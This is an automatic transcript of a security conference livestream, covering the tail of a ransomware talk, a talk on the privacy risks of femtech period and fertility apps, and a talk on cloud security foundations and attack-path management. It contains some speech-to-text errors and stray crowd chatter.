in this uh conference is going to say, we need to not be criminals. We need to save our kids from becoming me. Conclusion. Uh besides London 2022, I went after spyware. Uh on defcon 31, I went through after stealer and botnet. And on this talk, I went after ransomware. This is four out of the five horsemen from uh VX underground. Uh, I want to say that I won all of them, but I did not. I can say that I looked at all the five horsemen in the eyes and never took uh looked back. So, I think I won, but even if I didn't won, I didn't lose at least. So, that's a win in my
book. Thank you guys. And We do we do have some time for any questions if >> yeah any questions happy to take them I'll run around. >> So thank you very much for the presentation. There are some great insights there. Um why do you think these so-called sophisticated attackers like making these websites that are really easy to hack and they're just never improve? Because then they really care. So usually for the cities they really uh think that they're online only for the attack window. So that's half a day to a day. So you have to be extra quick. And for the WordPress, I think they don't really understand what the [ __ ] they're doing. They do care about
getting getting the easy money in and nothing else. >> Thank you. >> Thank you. Anyone else, guys? Oh, that lady here. >> Hi. Absolutely loved your talk. Uh, I wanted to ask what do you think of the cartilization of different ransomware groups going together like crimson wave and the spider lapis scatter scattered hunters groups coming together to kind of infiltrate different groups together. >> I Okay. I can answer it single word. It's capitalism. Again, I also love capitalism. I'm just saying that. But it's one of those things that they will unionize. They will become one so that they can not uh they can maximize the profits by minimizing their uh their costs. So again, capitalism.
So they will try to ease their way into anything. Okay. Anyone else? Guys, folks, thank you again.
All right. Thank you so much. Great presentation. Um, couple of practical things. I guess we have an early coffee break, so coffee will be served in the back. Um, if you want to sit down, you can go down to the restaurant. Uh, also outside is a huge photo booth. I know it says€5, but it's free. So use it. Um, oh yeah, throughout you'll see uh QR codes, sorry, QR codes asking for feedback. Please leave it. We have two types. We have speaker feedback. That's per track. So you can leave your feedback for all the individual speakers. We'll relay that feedback for you so they know how to improve or to say malaka a few more times.
It's my best Greek word. Um, there's also feedback for us from the organization. Um, that's overall. So, if you have anything to improve for us or just tell us you love it, please do so. Thank you.
You can just keep it, I guess. >> Are we ready to go?
>> All right, welcome back everybody. Please grab a seat if you want to sit here for the talk. Uh, our next speaker is Aroki Nike. I'm hopefully pre pronouncing that somewhat correctly. Um she's a security engineer at SQR and she will be talking about uh FEMA and the technical and ethical implications around this kind of technology. So please give a very warm welcome to our next speaker.
>> Hello everyone, welcome to my talk. Um so I'm presenting on beyond the pink data risks in fem you can't ignore. I'm Arohi. I work for SQR as a security engineer and this is my passion project. So this started with just um simple everyday event. I was looking for a period tracker for myself which accounts as a fem app. And then as I was searching for it, I have a habit of um you know looking for privacy policies or data practices of the apps before I give my data to them. And the deeper I looked, the more concerning and stranger the policies went. And that's how I got into a rabbit hole of um really weird
data collection practices. And that's why I'm here to share my insights with you. Hope you enjoy it. So let's start with what is fem. So femeche or female technology is a term used to define software and services that use technology tailored towards women's health and wellness. So these are fertility trackers, period trackers, um uh pregnancy and nursing care, women's sexual health and wellness, all of these applications like Flow, Clue, Maya, uh you must have heard these names. These are really big names right now. And FEMT is not just limited to uh applications like mobile apps but they also include variables then um uh diagnostics and tele health services but today we will focus mostly on the uh
mobile apps. So fentech in Europe is a big thing now. Europe consists of 28% of global fem market with more than 540 active companies in 23 out of 44 countries and um by 2032 the European fem sector is expected to grow beyond $ 35 billion. Isn't that insane? And still we are in a stage of infancy with feech because it's a highly underfunded and underresarched field even if it's growing in terms of money um we still lack a lot of uh data collection and regulation around it and I guess this gap is not uh something that we should be bothersome about but it's a good opportunity to create more transparent and evidence-based FEM in the coming years.
So, FEM fem apps have been in place since a long time now since like early 2000s, but they got traction after the flow apps controversy around data privacy that they are sharing users data with third parties in 2021 and it's continuing. So it happened again in this year twice now but uh yeah can't can't really go into the political nuance but uh high time that we look into it. So these apps are incredibly popular. They have tens of millions of users per month and hundreds of millions of downloads worldwide. But why? Why do we seek fem apps? To understand our body better, to manage fertility, achieve or avoid pregnancy, for emotional validation and community. A lot of these apps have a
community feature. So you can go in and ask your queries. They do say with a disclaimer written above that don't put personal data, but then there's a lack of digital literacy around the world. So we do put our personal data there as well. Um, then we use it for convenience because it's not always easy to manually track your period and to feel empowered and informed. And I relate to all of this. When I was young, I was told I was taught to manually track my cycle over a calendar in our kitchen. Um, but yeah, now today with all the fem apps, we have so much more insights. We have so much more data points to look at.
But the thing is the fem apps also come with a lot of empowerment wrapped in them. You might recognize some of these. These are some of the slogans that very famous femic apps usually use. They say your health simplified with us. The birth control app your friends won't stop talking about. My favorite is all natural birth control powered by your body's signals. Does it sound empowering to you? Does it? Well, it's just not the slogans. Empowerment comes grabbed in aesthetics as well. And these are the ones that they deliberately use. And when once you spot this aesthetic, I'm sure you won't unsee it. Bear with me. Can you see all these apps? These are the most famous apps. So if you go on
Google App Store or your Apple App Store and just type fem or period tracker, these are the ones that you get on the top of your list. Can you sense a theme? Is it all too pink? I find it quite stereotypical, but that's my opinion and you can have your own. Some people like pink pink, but cool. Um, but yeah, this is the aesthetic that they use. And all of these apps are pink or the second most used color is purple. I get it that it's a marketing gimmick. Uh, pink is a very feminine color used for visibility and inclusivity. But then these apps were traditionally made to empower women. Don't you think that with this
pink branding and empowerment slogans, it's trying to drive us away from empowerment, the trope that it was made for?
So what is beyond the pink? Have you heard about pink tax? So pink tax is usually associated with uh everyday products like razors, deodorants, shampoos, lotions which uh women pay much more for because it's pink in color and um it's not really associated with fem usually but then with AI powered insights and premium versions of these apps I think pimpax has found its way into fem as well and it's not just money it is more about we pay in terms of privacy and data exploitation. Isn't that pink tax as well? So behind these friendly colors, empowerment slogans, there lies a complex ecosystem of data algorithms and sometimes invisible risks. Let's get more into some technicalities.
These are some of the data collection practices that fem apps use currently. So when whenever you download any kind of app, it always takes your device data which I'm fine with. Uh it takes your behavioral meta data which is again general data. All of the apps do that. All right, good. But then when it comes to FEM um uh they ask you to log into the app. So there goes your name, email, contact information. Most of the apps now have premium features. So there goes uh payment information as well. A lot of them collect location data for some reason which I find a bit unnecessary but they do. And um uh yeah so all of this is
personally identifiable information or PII. What goes unnoticed with femeche is apart from this information there's more personal and intimate information that these apps are collecting. So there goes our menstrual cycle data. So period dates irregularities then flow intensity ovulation test results, pregnancy tracking, conception date, due date, uh menopause symptoms, then birth control. Um then we have sexual health data. So femic apps not only take your data but indirectly they are taking the data of your sexual partner as well. um mental health and emotional well-being. They have really good um mood logging features which are insightful. But then all of this information um when clubed together, it creates more of a digital profile. And even if it's
not coming from just one app, they if the information about you is coming from other third parties, it is a whole profile of a person. Then there goes lifestyle data. Uh these apps also have a good feature for um water intake. Um that's a good example of how they how much niche we are going into. Um then sleep patterns, breastfeeding and lactation data, medical history and doctor visits. This is what I find really concerning. Um you have to log your doctor visits. Some of the apps also take what medication you're on or uh what kind of um treatment you're going through. So you can log your diagnosis as well which is really concerning. It comes with a disclaimer
that uh when they try to provide AI powered health insights they say that you should not trust these and you should seek help from a medical practitioner but it is written so small that you hardly look at it or if it's a popup we we don't take like 5 seconds to read it but just close because it's irritating but again um let me give you an example why Why this is so crucial? Just imagine if uh a woman is uh logging her breastfeeding data into the app and the app is also collecting her location data along with it and somehow if this data is leaked or sold or in the hands of um data brokers.
They have a full profile of um her as well as her child. They know where she is with her child alone at her most vulnerable. And this is not just um digital risk anymore. It has escalated to a physical safety risk
that that um invites us to like looking at the privacy policies of these apps. So, do we actually read privacy policies? Nobody does, isn't it? They are long, complex, full of jargon. And yeah, they they put the accept button in bold pink or blue or whatever color you like. And there's hardly an option to um reject those because if you reject, you might not be able to use the app. But if you take some time and read those then you might find some concerning patterns. So in 2022 Mosul did a study on all these fem apps and their privacy policies and they rated them from a level of creepiness like most creepy to the least creepy. And kid you not the
most famous apps right now are the most creepiest. And I thought it is still like 2022 it's fine. So I thought I'll do a review myself after 3 years. It might be better. But no, it was not at all any better. So this is what I found. So there's ambiguity in language. They use terms like we may share your data with trusted partners or your data is used to improve our services. It sounds really harm harmless but it's kind of vague. What who are these trusted partners or what kind of data are you using to improve what services? We don't know. Um I read one of these uh privacy policies and it said we do not sell your data and
just three lines below that it said that we use your data for marketing and research purposes. Doesn't it mean it's still getting monetized somehow? Then there are difficult opt out options. So if you go like of course um now because of GDPR and everything these apps need to provide user control deletion. So if you go in any of these apps, it is so difficult to find to opt out of um all the any any kind of tracking or delete your data. I think this is one thing that the app should do easily, isn't it? We anyways don't read the whole privacy policy. Let us find the settings clearly as at least I would say. Um there is third party
involvement of course. So, a lot of these apps um let you sync your device with your partner's device and a lot of with v uh like variables as well like Fitbit. Um and they also um have this integration with other apps like your in-built mobile apps. So, with all of this said, it feels really nice that you can integrate and it's good. Everyone can have visibility and everything. But uh if you read the privacy policies with them, there's so much lack of responsibility. So the fem app might say that um we you can you're free to integrate data but uh we don't have responsibility of the data that goes outside our app and then if
you read the privacy policy for any variable they say we get our data from third party and we are not responsible how they track it or how we get it. Then who do we complain to? In terms of regulation around EU, it's still good but we don't have one single regulatory body for fem. Right now we have got three which align a bit with FEM. So there's MDR which is the medical devices regulation which determines when a feech app counts as a medical device it should meet all the safety safety regulations and testing standards. Then there is digital services act which is more reactive than proactive um by which I mean that if you complain
only then they act on it uh otherwise it's just guidelines. So it addresses platform transparency, targeted advertising and accountability. Um this is more for influencers and how you market the app. And of course there's GDPR. So it governs how sensitive health data is processed, stored and shared. We have upcoming EU regulations, the EHDS and digital fairness act, which I think we should keep an eye on how it aligns. But I still think that because it's so fragmented and given that fem industry is growing so much, we need a regulation for it or at least we need MDR to act on it. So let's talk a bit more about MDR. So medical regulation um like medical
regulations works only when a company labels themselves as a medical device. So um most of these apps label themselves as wellness or health and fitness and that's how they bypass the MDR. Um but again in MDR it states that if your device or your app um it is used to diagnose or predict um reproduction or fertility things like that it should be terms termed as a medical device but however it is not and that's a big gap there. So that's how they bypass all the um safety testing and oversight. What do you think a privacy first future would look like in terms of PEMC? So have you heard about data anonymization? I bet everyone has, isn't it? So that's
that's just the basic thing you need to do according to GDPR and everything. But again research has shown us over and again that uh we can still get back to the original data even if we anonymize data now and none of the fem apps have gone beyond data anonymization really. So there's another thing called differential privacy which means that you can add noise uh to your data. That's how um you kind of anonymize it and it's an advanced technique for data anonymization I would say. So you cannot trace back to your data. So it's time that we use better functionality or better majors in these terms. I guess a lot of these apps use of course I guess
cloud backups uh because it's easy but uh then again it with cloud storage it anyways comes with a lot of its own vulnerabilities but then uh there's Apple's health app that does ondevice data processing and that also asks the users if they want to back their data up or not which is a fair deal I think Why why would I want somebody to take a look at my data um just so easily just because I back it up myself? But if I know that I don't want to back this data up, then it that feels empowering to me. That feels that I am in control. So yeah. Um but there's again it's just the Apple Health app doing the ondevice
processing and no default backups. It's not a norm yet. User control deletion as I said earlier those settings are really deep into the app and really difficult to find and again what's the guarantee that it is the data is collected wisely and what's the guarantee that if even if I uh you know delete my data from the app it's actually being deleted. you know when the 2021 flow app controversy happened um a lot of women um deleted the app completely but that does not mean right that the data is being deleted it's just the app but again there's so much lack of digital literacy around that we think if I don't use the app anymore I'm safe
then encrypted data syncs this is really something that I was shocked to know. Um so as I said that these apps have um the functionality to sync with your partners' app or variables. So a lot of these apps if you read the policies or their data collection practices they explicitly mention that there's no encryption in between and it is crazy. We have gone so much advanced with other security measures and everything right now and how how are we not encrypted yet?
I think when when we talk about data breaches, we just talk about monetary losses or reputational loss. But with fem collecting so much intimate information, I think we need more of a sociological approach to it. And I'll tell you in a bit why. So if uh if we um look at it as a threat model, I think the focus areas would be assets. So the personal or intimate health data, then there is behavioral metadata, user identities, shared privacy, user generated content. Of course, uh there are threat actors that are not just developers, advertisers, but then there are employers, governments, abusive partners as well. Just for an example, if uh if if an employes data is breached
from her um fem app, it might um firstly it might lead to a lot of um stigmatization. But again, if uh everyone in the company knows and suddenly her manager passes her over for a promotion, isn't it workplace discrimination? If they know that she's trying to conceive or anything like that, isn't it crazy? That's an extreme example. I get it. But still could happen. So that's why I say employers, governments, abusive partners, and communities, stalkers, cyber criminals are all threat actors. Um, in a lot of societies or a lot of countries right now, menstruation as a topic is a taboo and not a lot of people talk about it openly. And that's where if somebody is using a
fee app and someone finds out that they are um they are trying to conceive or they have a missed period, it can cause a lot of social riot. I would say also in terms of government and prosecution even um there countries with really stringent abortion laws this could go haywire absolutely because um you see even if a missed period or um even if you don't log for a bit in the app they can use the app's data to prosecute someone then attack vectors of course dark patterns SDKs GP APS is really a big one. I don't I still don't get why do we need location data for this? Um APIs uh coercion and surveillance inferred
disclosures and uh legal loopholes. One thing to mention when uh when these apps provide you health insights. So we don't really have um cohesive EU data for FEM. it's just um you know a limited amount of database coming from US because it's all started in the US. Um but then we need a location based or a more uh comprehensive database I guess to work more into it to give health advice but then um all of these apps assume a lot about your gender emotions and that's how the health advice goes. Um I guess that's what um I mean by inferred disclosures that they just conclude from generic assumptions. Um there are critical gaps as we spoke
about weak and manipulative consent mechanisms lack of data minimization absence of collective privacy safeguards. By collective privacy I mean not just the user the logged in user's privacy but also the privacy of their child or their partner because we are indirectly giving all that data as well. Um algorithmic bias and lack of transparency. Uh psychological harms is something we always miss out on. uh over reliance on flawed AI because they do say it's still health insights not health advice but in terms of emergency we take it as health advice. Um there have been a lot of comments on these apps um social media posts as well that the app is so good that it told me
about my health condition before my doctor did which is just crazy. um false reassurance, health anxiety, and obsessive tracking. It can be obsessive because uh it's it's similar to Instagram resed to just scrolling. It's addictive to track it because it gives you uh health insights every now and then. It pops up uh notifications like you must be cranky today because you might be ovulating, which is really annoying at times. I'm not cranky today but now that I saw the notification I am. Um there is a lot of shame and stigma around it as well. If any kind any of this data is really leaked out it could lead to a lot of stigma for um women
their families and overall this is creating a loss of trust in digital care as these apps were made to empower women. I don't think they're doing it anymore. And it's been a long time that this has been going on with a lot of um lot of news coming up around sensitive data and how the data practices are really really concerning um and that's leading to a lot of loss of trust and that's the last thing we want isn't it? So I think real empowerment in fem requires reentering privacy, autonomy and ethical accountability while transforming invisible harms into visible change. Our data belongs to us, not governments, advertisers, nobody, just us. So I just want to urge everyone
to be aware, ask questions, um, and take control of your data. Thank you.
Do we have time for questions? >> We have about two minutes for questions. So, does anybody have a question?
>> Hello. Thank you for the great talk. I think it's a very important uh topic and issue and uh I'm just curious whether you can think of any or you know any digital alternatives you can like we can use um because we of course can use just normal calendars but uh uh what about digital world? So there are a few options that are pretty fine like the Apple's health app or there's an app called Yuki that does um ondevice processing. So it's offline almost and for myself I do I have written a Python code for myself that I use to track my cycle. Uh but then again um a lot of these apps have anonymous
modes in them as well now which I'm not very sure about but uh still uh the thing is they don't have the same functionality as the whole app would have but then it's still better to be anonymous somehow I guess but best way if you can write a code for yourself. >> All right one more question maybe. Okay. >> Um, thank you for the talk. Was actually really really insightful. Um, you spoke about regions globally where some of this is taboo to to speak about or to talk about. Um, have you noted in your research uh any apps or companies that have uh adapted their uh policies that are more evasive for regions that it is
considered taboo? >> I did I did look at that and no none of the apps have actually considered a sociological approach to it. It's very generic and mostly targeted towards um US Europe but hardly takes into consideration any of the uh regions like there are some regions in India or there are some regions in Africa where it's really critical to even speak about these things um and there's absolutely no consideration. The thing is um there's a lot of lack of awareness around it. So I think even if uh with me if I talk to my friends or my family older people in my family they don't know they don't even know these apps exist but when it comes to the younger
generation even if they do know that there are these apps now there's no consideration of how much data we should give to it give to these apps or not and I think with social media it just becomes a bubble isn't it that it just this word just spreads out and again yeah there's no no consideration this has happened in some of the countries where there are really stringent abortion laws that this kind of data is used for prosecution and it has gone really really wrong but yeah >> okay we're out of time thank you very much for the talk >> THANK YOU SO
OH MY GOD.
Water
alive. Christmas.
All right.
How do you
know? I wonder again.
Yeah, but unfortunately it's not just
enough
Did I take that?
I'm
also
like
Foreign
Thank you.
I'm not even
This is
I'm also like I'm good
Sister,
All right, welcome back everybody. Our next speaker is Risa Bar. She does uh cloud and AI infrastructure at Microsoft and she'll be talking about building secure foundations and gaining some resilience in the cloud which I think is a rather important topic because that's where all my data is. I'm not sure if yeah now my mic is uh is on as well. So first of all I really want to thank Bides to invite me up to this stage. So uh I think you yeah you did an amazing job organizing this event and I'm very happy to be part of that. Uh so today we talk about uh cloud security uh ono 20 25 and uh there I'm
going to talk about some things that you feel like yeah of course this is simple this is easy while then maybe help uh the companies in the Netherlands to actually implement it because I work for Microsoft I'm a cloud AI infrastructure and security uh solution engineer and I talk to all of the big organizations in the Netherlands and I help them to adopt the cloud in a secure and safe way. And a lot of these things that I talk about today, they they really uh yeah have challenges uh with it. And if you look at my talk, you think, "Yeah, but this is easy. This is a no-brainer. You should do it." Well, please talk to all of my customers and
help them to uh to implement things in a secure way. Um I'm a security enthusiast. I've been working in the cyber security field for the last almost 15 years now. And uh I really en enjoy it especially because uh yeah you have to learn new stuff on a daily basis otherwise uh you're out of the game security challenges nowadays. Uh then I'm going to uh talk a little bit about how you can secure the use of uh SAS applications and then what can you do to make sure that your EAS and pass uh applications are uh secure as well. Then I will close off with some uh key takeaways and uh if you have questions
feel free to ask them in the end uh after my talk there's also some lunch uh served so we can also have some conversations uh during lunch. So when I started my IT journey 15 years ago, the company that I worked for at that moment, everything was still uh on prem and then some Microsoft people they come over and they said come come to the cloud, come to the cloud because it's super secure and at that time that was really the feeling like oh if we go to the cloud then maybe our IT systems are more secure because uh on premise we we had to really secure the network. We had to secure identity. So
there was a lot of things to do and then we thought oh then we go to the cloud and everything is more secure because big companies like Amazon, Google, Microsoft they will take care of those uh those things. But then if we look nowadays I just asked I use uh of course I used copit a lot to get some of the slides for me etc etc but I also asked it give me some examples of the last uh year of some cloud security related incidents and the list was super long right I mean I I just uh yeah pasted some of the names here in the slide but I think it was yesterday cloudflare had had some incidents uh but
also So for Microsoft there were some incidents in the last uh few months etc. So you see cloud security incidents happening on a yeah I think on a daily basis uh also with with the very big names in there and so cloud security is not not that easy but what are then the biggest security challenges with the cloud nowadays. So from all of those logos that you saw, most incidents were caused by misconfigurations and human errors. People make mistakes. For instance, with crowd strike as somebody really did their best uh to deploy something in a fast way. But then yeah, he made a mistake and a lot of computers were then inaccessible and people couldn't take
their planes etc. because uh KM was a big user of of crowd strike. But it's it are human errors. Then the other thing is there are a lot a lot of of known unpatched vulnerabilities in the cloud. And so if I go to my customers and we look at some dashboards, it's amazing how many vulnerabilities are out there. But sometimes they don't know what to patch anymore because there's so many vulnerabilities and a lot of these vulnerabilities. Yeah. It's also not that bad. If you have a server which has a vulnerability and it's not directly internet facing then maybe it isn't a problem yet and then they feel like oh I yeah I don't have to fix it.
The other thing from a lot of these logos are identity and access management uh uh issues. Uh u multiffactor authentication is a technology that exists for a long time but not everybody uses it in a correct way or they yeah they have MFA solutions that can be uh still intercepted. Another issue that a lot of enterprise companies face is the use of of shadow IT this shadow cloud solutions and because it's super easy to just Google something you find a nice application and you start using it but what if you also start using uh enterprise data in there then before we also h during the main track the guy over there talks about ransomware attacks well these ransomware
groups also discovered haters There's now a lot of interesting data in the cloud. So ransomware groups also start attacking the clouds on a more frequent basis. The other issue is compliance. Just because you can use something doesn't mean that you are allowed to do it. So that's also especially in Europe where we have very complicated laws uh across different countries. And then you really have to think about what are you allowed to use. I also work for instance with uh a lots of a lot of large banks that also operate for instance in Germany. But in Germany some of the controls that they do in for instance the Netherlands they are not allowed to put those things also
in the cloud in Germany. But you have to think about these things up front. But it's complicated. Then you also have the risks of insiders uh arising also more in the cloud. Then you have the use of uh insecure APIs because a lot of cloud uh things communicate with each other. Uh you have supply chain risks because you use so many different technologies and if something breaks there then that can have a big results also on others. And uh last but not least the rise of AI also empowers the rise of AI powered attacks that's also becoming a problem for the cloud. So then if I look at this list and I look back into the time when I was still
working on premise then I feel like hm am I really more secure there's a lot of things that I need to think about to make the cloud secure and so who should actually fix this then uh uh and maybe also to take one step back like is this problem then becoming smaller no it's only be becoming bigger right a lot of companies have now started to adopt adopt generative AI they also use generative AI now to produce new applications. So also the speed of new applications popping up in the cloud it's expanding and you also see that in the uh security that uh the rise of cloud security attacks is it's crazy. It's really on a
on a yearly basis it's it's growing. It's growing. And one of the issues there is also that and you have a lot of these different security vendors that really focus on specific elements and then at the end you have to tie everything together again because uh uh the attackers nowadays they are really smart. So they also know that you have different tools and and we also still work in in silos and so then but then again we should fix it then. And so let's maybe go back to the responsibility model. Is there anybody in the room that has hasn't seen this before? There are a few people uh uh that haven't seen this before. So basically
what the responsibility metrics uh uh says is who is responsible for certain elements of your uh cloud applications. So when you were still on premise you were responsible for the physical layer for the application layer layer and also for the usage layer. And if you go all the way up to software as a service then most of the things are taken care of by the cloud provider but not everything. So a customer is still always responsible for the usage layer also the about the data that's in there to make sure that the right accounts are in there but also to make sure that the controls that you have in the applications the configuration that that
is set up in the correct way. And then in the middle you have app platform as a service, infrastructure as a service where uh with infrastructure as a service companies like Microsoft they take responsibility for the physical aspect and the rest you have to do have to do yourself and with platform as a service it's really a mixture. Some of the things customers have to do themselves and some of the things uh Microsoft or Amazon Google have to take care of it. But a lot of people they forget about this. They think oh I do something in the cloud so Microsoft they say yeah but I bought a pass service from you so it's secure right then I'm
said no it can be secure but you still have to set it up in the correct way so that still hackers cannot come in. So then maybe to go one step uh deeper into this. So how to then secure the use of SAS applications. So software as a service. So the first thing is as a company you really need to understand what SAS applications are my users using. And now with the rise of generative AI, you really have to think about these things uh fast because users really want to adopt new technology. when I was a security officer back in the days. And this this picture shows how how much time it takes before 100
million users on the planet start to adopt a certain technology. For smartphones, it took 17 years or 16 years before 100 million users on the planet started to to use uh the mobile phones. So when I worked at that company back in the days, we took almost one year to select all of the security controls to allow smartphones in the company. If you then look at for instance Chat GPT, it took two months before 100 million users on the planet started to adopt that technology. So as an enterprise company, you don't have a whole year to think about do I allow it, do we don't allow it? No, you have to act fast. You really have to think about
it. Do I want this application to be used by my users? Yes or no? And there are a lot of tools out there from Microsoft but also from a lot of other vendors that can help you to do this that can really help you to assess what are your users using and then you can put some governance control on on it. Do you allow it? Do you block it or do you allow it with certain uh controls in it? H and with this it is super important and critical to really focus on the data. What is it? What is the data that you want to protect and to to in order to do this you first need to know what
is the data that your company is using and what is critical data for you and then you have to put controls like information protection, encryption and data loss prevention policies on it. And what you also shouldn't forget is that you also need to govern your data. If your data is not needed anymore, maybe throw it away. And uh sometimes you have to keep data because of regulatory reasons etc. But you really need to think about these things because they can also uh uh be used in in uh SAS applications and with software as a surface you also shouldn't forget that your SAS applications might be communicating with each other. During the uh key talk from
Ro, he also talked about the rise of aentic AI agents uh doing a booking for you for instance. Well, your agents might also be talking to other agents and you need to think about these things and there are also a lot of ways in which you can do that. So that's just on a very high level what you can do to secure your SAS applications. But then what about your pass and EAS applications? So the things that you will put in your Amazon, Google or Microsoft cloud. So the biggest challenge here is and yeah I talk to a lot of these companies is really the silos in the company because then I ask a company for
instance to the security people so who's responsible for cloud security and then they say well that's the the cloud platform team and then I ask a cloud platform team. So who's responsible then for security? Well, the developers they have their own subscriptions and and they are responsible for it. And then I ask the developers, so are you taking care of security? Then they say, yeah, if they want us to implement security controls, then the security people should tell me. And then in the end, I'm like, okay, so nobody is taking care of security. Let's take a look into your cloud estate. And then we actually see that a lot of things are wrong. And then I'm just so happy for these
companies that they haven't been hacked yet or maybe the hackers are super smart because they know that they have access to a lot of data and they will just not tell anybody about it yet. So one of the things to overcome this uh um add this silos is to really collaborate with each other and really work on the idea of a secure landing zone. Have does anybody know about secure landing zones already? I see some hands. Not everybody. So with a secure landing zone, it's yeah just also what you have on the airport. What you have is you have a watch tower, you have an airport and some things are arranged uh by uh uh for instance with you have the
luggage carriers etc. So that is arranged for everything for everybody and then the pilot itself still has some room to to do certain things as long as he lands on a certain uh landing platform. And this is also what you can do in the cloud. And uh uh what you then do with creating uh landing zones is that you really think about what do you arrange in the platform and what can you arrange on a application layer. And if you are designing these secure landing zones then you really have a lot of different topics where you talk about and these topics they are true for Microsoft but also for the other big cloud uh uh
vendors out there. And from a security aspect it is really important to think about identity and access management, how you will do your networking and uh how you will set up your security. And what you will then end up with is something like this which looks a bit complicated. But what it does in here is that it has certain aspects that it's already arranged by the platform and that is really related to your security to your identity uh etc etc. And what you then have in the end is that you have certain elements that are arranged by the platform. And then within that uh uh place you get specific zones for applications where they can where they can deploy their
applications but the boundaries are already controlled by the platform itself in collaborations with the security team, cloud platform team and devops teams. And then if you would zoom into one of these uh uh applications for instance then the application itself has a lot of controls that it can do but already some other elements like identity and access management uh uh but also policy enforcement etc is done through the central uh platform and so in the platform you can already say for instance I will never allow a storage account to be public uh uh publicly accessible through the internet. These are really the controls that you can set from a platform level and then there's no application that can overrule this
without getting an exception first and this is really what helps you to set okay these are the boundaries this is your safe landing zone and then uh you can uh continue but then still that application also needs to come to the cloud and so you have your secure code to cloud uh principles And here the first step of course is that when a developer when he or she is coding that it is continuously triggered by okay there are vulnerabilities in your code and you should fix this because you don't want to start with applications uh that already have known vulnerabilities before it's deployed to the cloud. Once the application is done then you also need to make sure that you uh also
control uh your pipelines. So pipelines are ways into uh how you can deploy certain applications towards your your cloud platform but you really need to have the right controls for this in place. So who can make for instance changes to your uh uh codebase who can deploy things to your cloud because you don't want that uh anything is just deployed to your cloud environment but you really need to think about uh uh uh these things when you are deploying things uh things to the cloud and then uh once everything is then in the cloud you also need to have runtime protection and so I sometimes say okay this is like a diaper for your cloud
because you just know that things will happen, right? I have a four-year-old and yeah, so I know about sometimes you just although he can do things by himself, he still needs this. And this is also what you what you really need in the cloud because new vulnerabilities are uh uh exposed on a daily basis. People make misconfigurations etc etc. So you really need to have that runtime protection and you have a lot of different flavors for this. you have uh things that can uh defend your servers, your APIs, your containers, uh your your secrets, etc., etc. And you need all of these things to make sure that if something happens to your cloud environment that you have a layer of
protection before things really go wrong. And of course, you also need to have a security monitoring in a cloud that collects all of this information from all of your different runtime protection things uh your identity and access management systems, but also the status uh uh of everything as so that you can monitor it by uh for instance a seam uh that that can be sent to Splunk or uh whatever because you really need to control everything that's that's happening uh in the cloud And what I see now happening uh as a new trend, what I think is really good is that we are now going to a more shift left approach instead of focusing on
everything that can go wrong is that we go one step where we really make the the the shift left and really look into continuously threat and exposure management. Uh so the picture here it's just a uh an example of how Microsoft implemented it. But uh the idea here is that instead of looking into all of the different cloud vulnerabilities that are out there is that you really uh tie everything together. So you also look into what your users are doing, what what's happening in your meals etc. what's happening in your cloud and then uh what you get is a attack pelt of how a attacker could potentially breach for instance your storage account because in
most cloud environments if you look at the list of vulnerabilities the list is so long nobody feels like I should fix this anymore but then if you really can see what is the attack path a attacker can do to get access to certain elements then you know what are then exactly the threats where you need to focus on. So you really get things like uh choke points etc. So you know okay if I fix these servers if I fix this identity then I become more secure because then you can really focus on what are the actual risks instead of just focusing on uh compliance like just patching because you need to patch of course you need to
patch but with this you really get insights into what can an attacker do and fix it before an attacker actually does this and you need that diaper so to And uh just an example of this is for instance and you get an attack bed where uh as some servers are exposed to the internet there are some vulnerabilities on there and then you know okay from there uh that person on that server there is an identity that can uh log into a different VM and from that VM uh there's a secret stored where you can uh go to that uh storage and because you put everything in the system, you also know that there's personal identifiable
information on there. And because you know this attack path exists, you also know exactly what do I need to do to to fix it.
So then we come to uh to the key uh takeaways because I know that I gave you a very uh high level overview of everything that's that's happening around the cloud. But I think the first thing you really need to remember is that uh cloud security it is really a team sport. You can't just run it from a security uh uh uh team. You can't just run it from a cloud uh team. You can't run it from a DevOps team. You really need to collaborate each other because the cloud is now so complex. There are so many different capabilities and possibilities in there. There's no way that one team knows everything. So you really need to work together to really
set the boundaries uh uh together for instance in that uh uh secure landing zone. The second part is really governance is really key and so for instance when it comes down to to SAS applications and you really need to govern which applications can be used which applications can't be used but also for your pass and your EAS you really have to have the policies in place that you really want uh uh uh people to follow. What are really the boundaries? What are really the lines where you say okay this can never happen in my environment and then you can really enforce that uh through it but then you need to know what is the governance layer who who has
the the the actual say in in this is this the security team the cloud team or in the ideal situation it's it's a a combined effort then also cloud security it is really a continuous process I still see uh too many times at my customers that they say yeah we have a cloud security project and then I ask okay and how long will that project last yeah there will be some consultants and they will run it for six months they will fix it but then what are you going to do afterwards and there are new threats out there every day so you really need to re-evaluate everything on a continuous uh basis and I think really security is really
the most exciting hiding field to be in because I started uh and what I said I started 15 years ago the principles of security they stayed uh always the same how to protect your data what about confidentiality integrity and availability but then all the technology that you now need to secure has changed so I really get to learn on a daily basis and uh yeah I really really enjoy that so that uh that was my talk so uh thank you
Thank you very much. Are there any questions?
>> So, thank you very much for the presentation. It was very very nice to listen to you. uh I have a question regarding the attack pass that you have shown in the last slide. So I I would like to know which which kind of tool you are using for this and if these are really reliable because that seems quite complex you know to identify complete attack path in a cloud infrastructure that can have thousands of resources storage account and VMs and so on. So that looks very complex and for me that means that uh uh I'm not sure about the reliability of the existing tools to really show you a complete attack pass without any error for example.
>> Yeah, it is a a super good question. Yeah. So the um I think that that I will just answer now from a Microsoft point of view because that's the product that I know the best. Uh this was one of the most difficult things that we did over the last years because we really had to change our entire layer how we stored our uh security related data h because in the past everything was stored more like tables and it's super difficult to correlate all of these tables together. So we really changed the entire infrastructure on which we store data to a uh graphbased uh uh database. Um as the tool that I've just showed it
is uh CSPM so that's cloud security posture management in combination with exposure management and um yes it is super difficult to get all of this together and I think that this is also one of the challenges why it can sometimes be so tricky when you have a lot of different security products that you're utilizing because then it's super difficult to correlate them back towards each other. Uh so what we do with Microsoft exposure management there we also uh make sure that you can import data from different uh uh vendors. Uh it's not possible with all of the vendors out there because it's not an open API but we are making efforts to include more and more uh uh vendors in
there but really making sure that you have the right data dduplicating etc. It's really a difficult process and I think and now we have like the first version of it uh and it's getting improved uh uh quite fast.
Anybody else have a question? Okay, I guess it's time for lunch.
I just
What can I
do?
That was
Are you
You can't answer.
Wait
for something.
Take off.
I don't know.
This is like
Don't worry about
Thank you.
Yeah.
Any
Yeah. Yeah. Yeah.
I know.
I
don't know.
Good.
Yeah.
Down.
You're welcome.
You want
I feel like it's
I don't
know why.
Oh my god.
So
It's all good.
Thank you.
The mom fell off.
I don't
know.
It's going to buy it.
That'll be
America.
That's all right.
Well,
yes.
I guess so.
